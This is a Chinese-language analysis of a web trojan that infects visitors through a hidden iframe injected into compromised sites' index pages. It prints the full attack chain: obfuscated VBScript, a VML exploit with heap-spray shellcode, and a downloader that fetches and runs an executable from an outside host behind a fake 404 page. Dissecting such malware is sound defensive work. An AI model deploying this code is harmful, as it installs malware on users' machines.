经过我的观察推测此网站通过工具扫描网站服务器上是否有可以修改源文件的安全漏洞,如果有再找出所有的index.htm文件,然后在文件的最后一行加上一个iframe签入它网站上面植入木马的页面。
iframe标签的代码如下(文中将散播木马的网站域名:“www.zzyqr.com”写成“www.xxx.com”):
<iframe src=http://www.xxx.com/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
我们可以用flashget下载它签入页面中的源文件,代码如下:
<script>
<!--
document.write(unescape("%3Chead%3E%3Ctitle%3Exh_New%20Year///%3C/title%3E%0D%0A%3Cscript%20language%3DVBScript%3E%0D%0Aon%20error%20resume%20next%0D%0Aset%20zero%20%3D%20document.createElement%28%22ob%22%20%26%20%22ject%22%29%0D%0Azero.setAttribute%20%22cl%22%20%26%20%22assid%22%2C%20%22cl%22%20%26%20%22sid%3ABD%22%20%26%20%2296C556-65A3-11D0-983A-00C04%22%20%26%20%22FC29E36%22%0D%0Astr3%20%3D%20%22Ad%22%20%26%20%22odb.St%22%20%26%20%22ream%22%0D%0Aset%20F%20%3D%20zero.createobject%28str3%2C%22%22%29%0D%0Aif%20Not%20Err.Number%20%3D%200%20then%0D%0Aerr.clear%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3D2007.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aelse%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3DxiaoH.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aend%20if%0D%0A%3C/script%3E%0D%0A%3C/head%3E%0D%0A%3C/html%3E%0D%0A%0D%0A%0D%0A"));
//-->
</script>它将js代码简单的乱化了一下,但是可以看出来使用document.write向页面上面写东西,我们改成alert,看一下其真实代码:
它用js向页面上面写了一段vsscript代码,在vsscript代码中试图创建一个object,如果创建出错的话,会用iframe签入另外一个页面2007.htm,否则就用iframe签入xiaoH.htm文件,下面我们下载这两个文件,分别分析它的意图。
2007.htm文件中的代码如下:
<script language="Javascript">
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=POPWIN;expires="+ Then.toGMTString()
inject = "<iframe style='display:none;' src=xiao.htm width=1 height=1 frameborder=0></iframe>"
setTimeout("document.write(inject)", 5000 );
}
}Get();
</script>
这个文件中的代码没有经过任何乱化,这段代码首先写入一个一天之后过期的cookie,然后有签入了另外一个页面xiao.htm
xiao.htm文件中的代码如下:
xiao.htm
<html><title>欢迎购买xiao_2007 Vip网马</title>
<script>
t="60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,74,97,118,97,83,99,114,105,112,116,34,62,13,10,115,99,109,97,105,110,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,51,52,51,37,117,52,51,52,51,37,117,52,51,52,51,37,117,97,51,101,57,37,117,48,48,48,48,37,117,53,102,48,48,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,54,56,37,117,102,55,56,98,37,117,48,52,54,97,37,117,101,56,53,57,37,117,48,48,52,51,37,117,48,48,48,48,37,117,102,57,101,50,37,117,54,102,54,56,37,117,48,48,54,101,37,117,54,56,48,48,37,117,55,50,55,53,37,117,54,100,54,99,37,117,102,102,53,52,37,117,57,53,49,54,37,117,50,101,101,56,37,117,48,48,48,48,37,117,56,51,48,48,37,117,50,48,101,99,37,117,100,99,56,98,37,117,50,48,54,97,37,117,102,102,53,51,37,117,48,52,53,54,37,117,48,52,99,55,37,117,53,99,48,51,37,117,50,101,54,49,37,117,99,55,54,53,37,117,48,51,52,52,37,117,55,56,48,52,37,117,48,48,54,53,37,117,51,51,48,48,37,117,53,48,99,48,37,117,53,51,53,48,37,117,53,48,53,55,37,117,53,54,102,102,37,117,56,98,49,48,37,117,53,48,100,99,37,117,102,102,53,51,37,117,48,56,53,54,37,117,53,54,102,102,37,117,53,49,48,99,37,117,56,98,53,54,37,117,51,99,55,53,37,117,55,52,56,98,37,117,55,56,50,101,37,117,102,53,48,51,37,117,56,98,53,54,37,117,50,48,55,54,37,117,102,53,48,51,37,117,99,57,51,51,37,117,52,49,52,57,37,117,48,51,97,100,37,117,51,51,99,53,37,117,48,102,100,98,37,117,49,48,98,101,37,117,100,54,51,97,37,117,48,56,55,52,37,117,99,98,99,49,37,117,48,51,48,100,37,117,52,48,100,97,37,117,102,49,101,98,37,117,49,102,51,98,37,117,101,55,55,53,37,117,56,98,53,101,37,117,50,52,53,101,37,117,100,100,48,51,37,117,56,98,54,54,37,117,52,98,48,99,37,117,53,101,56,98,37,117,48,51,49,99,37,117,56,98,100,100,37,117,56,98,48,52,37,117,99,53,48,51,37,117,53,101,97,98,37,117,99,51,53,57,37,117,53,56,101,56,37,117,102,102,102,102,37,117,56,101,102,102,37,117,48,101,52,101,37,117,99,49,101,99,37,117,101,53,55,57,37,117,57,56,98,56,37,117,56,97,102,101,37,117,101,102,48,101,37,117,101,48,99,101,37,117,51,54,54,48,37,117,50,102,49,97,37,117,54,56,55,48,37,117,55,52,55,52,37,117,51,97,55,48,37,117,50,102,50,102,37,117,55,55,55,55,37,117,50,101,55,55,37,117,55,55,55,50,37,117,55,55,55,54,37,117,50,101,55,54,37,117,54,102,54,51,37,117,50,102,54,100,37,117,54,51,54,100,37,117,54,98,50,102,37,117,50,101,54,55,37,117,55,56,54,53,37,117,48,48,54,53,34,41,59,115,52,99,61,115,99,109,97,105,110,43,109,121,117,114,108,59,13,10,115,107,49,112,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,68,48,68,37,117,48,68,48,68,34,41,59,104,115,49,122,101,32,61,32,50,48,59,13,10,115,99,49,101,110,32,61,32,104,115,49,122,101,43,115,52,99,46,108,101,110,103,116,104,13,10,119,104,105,108,101,32,40,115,107,49,112,46,108,101,110,103,116,104,60,115,99,49,101,110,41,32,115,107,49,112,43,61,115,107,49,112,59,13,10,115,107,105,105,112,32,61,32,115,107,49,112,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,99,49,101,110,41,59,13,10,120,105,97,111,95,50,48,48,55,32,61,32,115,107,49,112,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,49,112,46,108,101,110,103,116,104,45,115,99,49,101,110,41,59,13,10,119,104,105,108,101,40,120,105,97,111,95,50,48,48,55,46,108,101,110,103,116,104,43,115,99,49,101,110,60,48,120,52,48,48,48,48,41,32,120,105,97,111,95,50,48,48,55,32,61,32,120,105,97,111,95,50,48,48,55,43,120,105,97,111,95,50,48,48,55,43,115,107,105,105,112,59,13,10,109,101,109,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,13,10,32,105,61,48,59,119,104,105,108,101,40,43,43,105,60,53,48,48,41,123,109,101,109,116,91,105,93,32,61,32,120,105,97,111,95,50,48,48,55,32,43,32,115,52,99,59,125,13,10,118,97,114,32,97,49,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,100,48,100,34,41,59,13,10,118,97,114,32,98,50,59,13,10,102,111,114,40,105,61,48,59,32,105,60,48,120,49,48,48,45,49,57,59,32,105,43,43,41,32,32,98,50,43,61,97,49,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,104,116,109,34,43,34,108,32,120,109,108,110,115,58,118,61,92,34,117,114,34,43,34,110,58,115,99,104,101,109,34,43,34,97,115,45,109,105,99,34,43,34,114,111,115,111,102,116,45,99,111,109,58,118,34,43,34,109,108,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,104,101,97,100,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,105,100,61,92,34,86,77,34,43,34,76,82,101,110,100,101,114,92,34,32,99,108,97,115,115,105,100,61,92,34,67,76,83,73,68,58,49,48,48,34,43,34,55,50,67,69,67,45,56,67,34,43,34,67,49,45,49,49,68,49,45,57,34,43,34,56,54,69,45,48,34,43,34,48,65,48,67,57,34,43,34,53,53,66,52,50,69,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,111,98,106,101,99,116,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,116,121,108,101,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,118,92,92,58,42,32,123,32,98,101,104,97,118,105,111,114,58,32,117,114,108,40,35,86,77,76,82,101,110,100,101,114,41,59,32,125,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,115,116,121,108,101,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,104,101,97,100,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,118,58,114,101,99,116,32,115,116,121,108,101,61,39,119,105,100,116,104,58,49,50,48,112,116,59,104,101,105,103,104,116,58,56,48,112,116,39,32,102,105,108,108,99,111,108,111,114,61,92,34,103,114,101,101,110,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,118,58,102,105,108,108,32,109,101,116,104,111,100,61,92,34,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,98,50,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,117,48,99,48,99,37,117,48,100,48,100,34,41,41,59,13,10,102,111,114,40,105,61,48,59,105,60,49,48,48,59,105,43,43,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,98,50,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,92,34,32,47,62,60,47,118,58,114,101,99,116,62,34,41,13,10,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
<script type="text/jscript">function init() {document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
document.writeln("<P>Additionally, a 404 Not Found");
document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
document.writeln("<\/BODY>");}window.onload = init;
</script>
</body></html>
通过上面的代码我们可以分析得到,此文件又是用js写了一些东西,然后居然要显示一个404未找到的标题来蒙骗大家,让我们看看他的js到底写了一些什么东西,看下图。
我们可以分析出来这段代码得最终目的是要在页面上面写一个object:VMLRender,从网上查到,此木马正是利用了VMLRender中的漏洞。也就是说到这一步,如果我们的系统没有打补丁的,如果一切正常的话可能木马已经被安装了。
以上分析是第一个病毒页面执行出错的步骤,如果不出错,就会跳到另外一个页面xiaoh.htm,我们可以用flashget下载得到xiaoH.htm中的内容:
<script language="VBScript">
On Error Resume Next
QnxyX="http://www.rwvwv.com/mc/kg.exe"
Set RJURL = document.createElement("object")
ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"
RJURL.SetAttribute "classid", ccc&lll&sss&iii&ddd
OOBnPl=xxx&mmm
Set MKHbx = RJURL.CreateObject(OOBnPl,"")
MKHbx.Open "GET", QnxyX, False
MKHbx.Send
MQWLa="~I7PRUGI1VAC.CoM"
SEiDu="~V5SFDYCLNTK.VbS"
XpTvd="~V5SFDYCLNTK.VbS"
SS="Scripting."
cc="FileSyst"
rr="emObject"
Set Kpzwb = RJURL.createobject(SS&cc&rr,"")
Set SrHOx = Kpzwb.GetSpecialFolder(2)
MQWLa=Kpzwb.BuildPath(SrHOx,MQWLa)
SEiDu=Kpzwb.BuildPath(SrHOx,SEiDu)
RR="Adod"
NN="b.stream"
UoNfL=RR&NN
Set HSREb = RJURL.createobject(UoNfL,"")
HSREb.type=1
HSREb.Open
HSREb.Write MKHbx.ResponseBody
HSREb.Savetofile MQWLa,2
HSREb.Close
HSREb.Type=2
HSREb.Open
HSREb.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"
HSREb.Savetofile SEiDu,2
HSREb.Savetofile "c:\\NTDETECT.EXE",2
HSREb.Close
WSjog="Shell.Applica"
Set Run = RJURL.createobject(WSjog&"tion","")
Run.ShellExecute SEiDu,"","","Open",0
</script></html><script type="text/jscript">function init() {document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
document.writeln("<P>Additionally, a 404 Not Found");
document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
document.writeln("<\/BODY>");}window.onload = init;
</script>
病毒脚本在上面的页面中创建了一个对象,然后从中毒的机器中取到了一些数据,然后发送到目标机器。还存了一个文件:c:\NTDETECT.EXE.最后又伪装了一下自己,给用户显示一个404未找到的提示信息。
后记:
制造病毒的人是希望通过病毒的传播给自己带去财富,熊猫刚刚被捕,又有人顶风作案,实在是.......。